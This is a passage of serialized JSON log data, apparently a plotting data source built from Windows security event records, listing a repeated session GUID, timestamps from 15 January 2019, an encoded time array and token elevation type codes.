32c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"